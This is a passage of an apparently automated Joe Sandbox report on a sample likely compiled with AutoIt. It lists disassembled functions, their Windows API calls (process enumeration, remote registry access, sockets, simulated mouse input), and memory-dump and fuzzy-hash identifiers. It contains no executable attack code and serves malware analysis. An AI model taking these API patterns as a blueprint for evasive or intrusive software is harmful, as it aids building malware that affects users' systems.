                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: d62d394f4ce47ca6a35cbe1f8c7e394dff566662f26dbf0ca7f00c9bb0f954be
                                                                            • Instruction ID: eefae5a12bd9ebcd4a7011f8dfc522732ecc1d86925e655ce014f538410afd7b
                                                                            • Opcode Fuzzy Hash: d62d394f4ce47ca6a35cbe1f8c7e394dff566662f26dbf0ca7f00c9bb0f954be
                                                                            • Instruction Fuzzy Hash: 0D313534600215EFDB22CF58DC84F6477A9FB4A718F1582A6F919CF2B6CB71A850DB41
                                                                            Function 003408AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003408F2
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00340918
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0034091B
                                                                            • SysAllocString.OLEAUT32(?), ref: 00340939
                                                                            • SysFreeString.OLEAUT32(?), ref: 00340942
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00340967
                                                                            • SysAllocString.OLEAUT32(?), ref: 00340975
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 2840bf1e071b52b2e5ab91d108cad4213bd846a3b83ad51a9b1a373c0af51115
                                                                            • Instruction ID: e87c6c72f98f02f5f7263fdbe908fe2d38dee5355db5d611b527a2b252221d7d
                                                                            • Opcode Fuzzy Hash: 2840bf1e071b52b2e5ab91d108cad4213bd846a3b83ad51a9b1a373c0af51115
                                                                            • Instruction Fuzzy Hash: 8A21A676600208AFDB159F78DC88DAB73ECEB09360B048125FA15DF1A1D770EC418760
                                                                            Function 00342472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: 9ff2c26d1a81e7bda9a5a956d848772d0d701758a7935b6f4d096f23fdc270cf
                                                                            • Instruction ID: 7f0b93c5b8a11d91474367621a1732ec52ab96527d4aee09aff7487b9b97da7d
                                                                            • Opcode Fuzzy Hash: 9ff2c26d1a81e7bda9a5a956d848772d0d701758a7935b6f4d096f23fdc270cf
                                                                            • Instruction Fuzzy Hash: F421497224422177C737AA359C12FBBB3DCEF66310F914029F446BF182E661AD82C3A5
                                                                            Function 00340986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003409CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003409F1
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 003409F4
                                                                            • SysAllocString.OLEAUT32 ref: 00340A15
                                                                            • SysFreeString.OLEAUT32 ref: 00340A1E
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00340A38
                                                                            • SysAllocString.OLEAUT32(?), ref: 00340A46
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 4a1a098d9fc6d1e353c3819b50426b6b19a9ba24f0e46e9e529bf87563c46d5f
                                                                            • Instruction ID: 50edb01d83455ec6b3332125556104cba0a05cafef2a8a2c06083eec007113d8
                                                                            • Opcode Fuzzy Hash: 4a1a098d9fc6d1e353c3819b50426b6b19a9ba24f0e46e9e529bf87563c46d5f
                                                                            • Instruction Fuzzy Hash: 7F217475300204AFDB15AFB9DD88DAA77ECEF48360B058125FA09CF2A1DA70EC418B64
                                                                            Function 0036A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                              • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                              • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0036A32D
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0036A33A
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0036A345
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0036A354
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0036A360
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: ef53d49e8dc0d66388dbe14626d393af82338c65f2d06ad319b1bd38ab28eab3
                                                                            • Instruction ID: 9718169c9ef3fddcef25bc9b414cb1ffd94fe19c495d4c7c0fff119bba8eb00e
                                                                            • Opcode Fuzzy Hash: ef53d49e8dc0d66388dbe14626d393af82338c65f2d06ad319b1bd38ab28eab3
                                                                            • Instruction Fuzzy Hash: 1C1190B5150219BEEF169F60CC85EEB7F6DFF09798F018114FA08A61A0C7729C21DBA4
                                                                            Function 0031CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 0031CCF6
                                                                            • GetWindowRect.USER32(?,?), ref: 0031CD37
                                                                            • ScreenToClient.USER32(?,?), ref: 0031CD5F
                                                                            • GetClientRect.USER32(?,?), ref: 0031CE8C
                                                                            • GetWindowRect.USER32(?,?), ref: 0031CEA5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 6b1052016fdf646980d8bdbac496163ef35380e0303977a4b8667497d18e35c3
                                                                            • Instruction ID: 932f7d72efc8cec83f9d383abbe0debb74625e32c6638bbc6bfcf84573501bec
                                                                            • Opcode Fuzzy Hash: 6b1052016fdf646980d8bdbac496163ef35380e0303977a4b8667497d18e35c3
                                                                            • Instruction Fuzzy Hash: B9B16B79910249DBDF25CFA8C4807EEBBB5FF08300F15A169EC59EB650DB34A990CB64
                                                                            Function 00361BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00361C18
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00361C26
                                                                            • __wsplitpath.LIBCMT ref: 00361C54
                                                                              • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
                                                                            • _wcscat.LIBCMT ref: 00361C69
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00361CDF
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00361CF1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                            • String ID:
                                                                            • API String ID: 1380811348-0
                                                                            • Opcode ID: 060dd4c199657cfe4b6ceb95921f8f9cf877747fa7862f670d0f23a052abffa3
                                                                            • Instruction ID: abfb87c1f8f7ee7102173b132c17d9cfb8d38902daf194eac346ce55486d1c46
                                                                            • Opcode Fuzzy Hash: 060dd4c199657cfe4b6ceb95921f8f9cf877747fa7862f670d0f23a052abffa3
                                                                            • Instruction Fuzzy Hash: 3A517EB15043009FD726EF24D895EABB7ECEF88754F04491EF5859B291EB70DA04CB92
                                                                            Function 00362FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003630AF
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003630EF
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00363112
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0036313B
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0036317E
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0036318B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 3451389628-0
                                                                            • Opcode ID: d8ed2ed7d426f665d9ca398454aedd5065f4aa47b52c01172717bb6d2e5c0974
                                                                            • Instruction ID: 7c05d7dc272d84181823e4f52fb4bfad956bbdf77165abb6217330b92d4f13e7
                                                                            • Opcode Fuzzy Hash: d8ed2ed7d426f665d9ca398454aedd5065f4aa47b52c01172717bb6d2e5c0974
                                                                            • Instruction Fuzzy Hash: 89516971109300AFC706EF64C895E6ABBF9FF89300F04895DF5558B2A1DB71EA09CB52
                                                                            Function 003684DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 00368540
                                                                            • GetMenuItemCount.USER32(00000000), ref: 00368577
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0036859F
                                                                            • GetMenuItemID.USER32(?,?), ref: 0036860E
                                                                            • GetSubMenu.USER32(?,?), ref: 0036861C
                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0036866D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                            • String ID:
                                                                            • API String ID: 650687236-0
                                                                            • Opcode ID: 64d93612879455eb956b3d635cb3874f0e136e2eb62e6186597a092c6788630f
                                                                            • Instruction ID: afb0b7c70e663e36d66de318f45566c813d2d5adef41993c1d449fb9cfca8ab4
                                                                            • Opcode Fuzzy Hash: 64d93612879455eb956b3d635cb3874f0e136e2eb62e6186597a092c6788630f
                                                                            • Instruction Fuzzy Hash: 8851A271A00214AFCF12DF54C845AAEB7F4EF4C310F118599EA16BB391DB70AE418B91
                                                                            Function 00344AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00344B10
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00344B5B
                                                                            • IsMenu.USER32(00000000), ref: 00344B7B
                                                                            • CreatePopupMenu.USER32 ref: 00344BAF
                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00344C0D
                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00344C3E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                            • String ID:
                                                                            • API String ID: 3311875123-0
                                                                            • Opcode ID: 8d77fa5c38d22917405e713358b9edb4630e709c8805a0907729167e7d90a2bb
                                                                            • Instruction ID: 22e984354cb9d7e241ec737cefa303257a1864cc008735588bd6d0cffaefecab
                                                                            • Opcode Fuzzy Hash: 8d77fa5c38d22917405e713358b9edb4630e709c8805a0907729167e7d90a2bb
                                                                            • Instruction Fuzzy Hash: E551CD70A01319EBDF22CF68D8C8BADBBF8EF45318F188169E4559E291E370AD44CB51
                                                                            Function 00358DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0039DC00), ref: 00358E7C
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358E89
                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00358EAD
                                                                            • #16.WSOCK32(?,?,00000000,00000000), ref: 00358EC5
                                                                            • _strlen.LIBCMT ref: 00358EF7
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358F6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_strlenselect
                                                                            • String ID:
                                                                            • API String ID: 2217125717-0
                                                                            • Opcode ID: 315958f7dc5230d6b3b57b27deaeb795aa08f2f436cd12e88ccca7a649539f50
                                                                            • Instruction ID: a0eeb0e4cbf49b17c728068b05aec7e5719576cc255e613fad593f9b1b9bb37f
                                                                            • Opcode Fuzzy Hash: 315958f7dc5230d6b3b57b27deaeb795aa08f2f436cd12e88ccca7a649539f50
                                                                            • Instruction Fuzzy Hash: 8241C271501204AFCB06EFA4DD96EAEB7BDAF48311F104659F516AB2E1DF30AE04CB60
                                                                            Function 0031ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • BeginPaint.USER32(?,?,?), ref: 0031AC2A
                                                                            • GetWindowRect.USER32(?,?), ref: 0031AC8E
                                                                            • ScreenToClient.USER32(?,?), ref: 0031ACAB
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0031ACBC
                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 0031AD06
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0037E673
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 2592858361-0
                                                                            • Opcode ID: 2e8800657b3d69b741438b70dd4f6c2ee19934dcde6e02a1118b14127c17a18a
                                                                            • Instruction ID: 0ffe3192692d0decdd53f720295ce5ce4f1c9eca1313b38ea814d5d05ed89949
                                                                            • Opcode Fuzzy Hash: 2e8800657b3d69b741438b70dd4f6c2ee19934dcde6e02a1118b14127c17a18a
                                                                            • Instruction Fuzzy Hash: AD41B0711057009FC722DF24DC84FA67BACEF5E721F040669F9A4C62A2C330A895DBA2
                                                                            Function 0036E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(003C1628,00000000,003C1628,00000000,00000000,003C1628,?,0037DC5D,00000000,?,00000000,00000000,00000000,?,0037DAD1,00000004), ref: 0036E40B
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 0036E42F
                                                                            • ShowWindow.USER32(003C1628,00000000), ref: 0036E48F
                                                                            • ShowWindow.USER32(00000000,00000004), ref: 0036E4A1
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 0036E4C5
                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0036E4E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: d99ac60732b0149bb33553537df501d7fa730e7e8b3a55299b40ea87b51b1dc2
                                                                            • Instruction ID: bc5dc566971262a13ad99191ba9f27f2c5a0d821ee808dd8b4b072b48b8a817c
                                                                            • Opcode Fuzzy Hash: d99ac60732b0149bb33553537df501d7fa730e7e8b3a55299b40ea87b51b1dc2
                                                                            • Instruction Fuzzy Hash: 9E416F38601150EFDB27CF35C499B947BE1BF0A704F5981A9FA588F2A6CB31E849CB51
                                                                            Function 003498BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 003498D1
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00349908
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00349924
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0034999E
                                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003499B3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 003499D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 2537439066-0
                                                                            • Opcode ID: 1b300bb931b1382ec8f341d5222919643fb7b230b5211228b90209e7f354884f
                                                                            • Instruction ID: 6b9a8da730854dd13928f090a11731cbd7295b219d5b5f0cf921c3c663f66039
                                                                            • Opcode Fuzzy Hash: 1b300bb931b1382ec8f341d5222919643fb7b230b5211228b90209e7f354884f
                                                                            • Instruction Fuzzy Hash: 88315231900205EFDB12AF95DC85EAB77B8FF45310F1480A9E904AF296DB74DA50DBA0
                                                                            Function 00359B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,003577F4,?,?,00000000,00000001), ref: 00359B53
                                                                              • Part of subcall function 00356544: GetWindowRect.USER32(?,?), ref: 00356557
                                                                            • GetDesktopWindow.USER32 ref: 00359B7D
                                                                            • GetWindowRect.USER32(00000000), ref: 00359B84
                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00359BB6
                                                                              • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
                                                                            • GetCursorPos.USER32(?), ref: 00359BE2
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00359C44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
